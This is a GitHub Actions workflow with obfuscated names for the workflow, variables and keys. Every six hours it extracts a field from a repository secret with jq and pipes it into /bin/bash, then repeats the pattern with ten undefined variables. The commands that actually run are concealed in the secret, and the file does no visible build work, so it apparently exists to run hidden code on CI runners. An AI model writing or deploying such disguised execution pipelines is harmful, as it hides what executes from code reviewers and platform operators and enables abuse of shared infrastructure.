name: xiaozhumei5678

on:
  workflow_dispatch:
  schedule:
    - cron: '38 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: xiaozhumei5678
        env:
          nit923: ${{ secrets.nit923 }}
        run: |
          echo $nit923 | jq -r .zxtud75 | /bin/bash
          echo $o5035 | jq -r .wqar79512 | /bin/bash
          echo $wnjm2272 | jq -r .me6382 | /bin/bash
          echo $w6578 | jq -r .okhq90836 | /bin/bash
          echo $ch84433 | jq -r .q43591 | /bin/bash
          echo $ey81353 | jq -r .h94672 | /bin/bash
          echo $qkw2907 | jq -r .xiki6 | /bin/bash
          echo $kr99 | jq -r .qufq21038 | /bin/bash
          echo $eb8 | jq -r .lz20 | /bin/bash
          echo $avkkw667 | jq -r .yact9522 | /bin/bash
          echo $j8 | jq -r .zdqc003 | /bin/bash

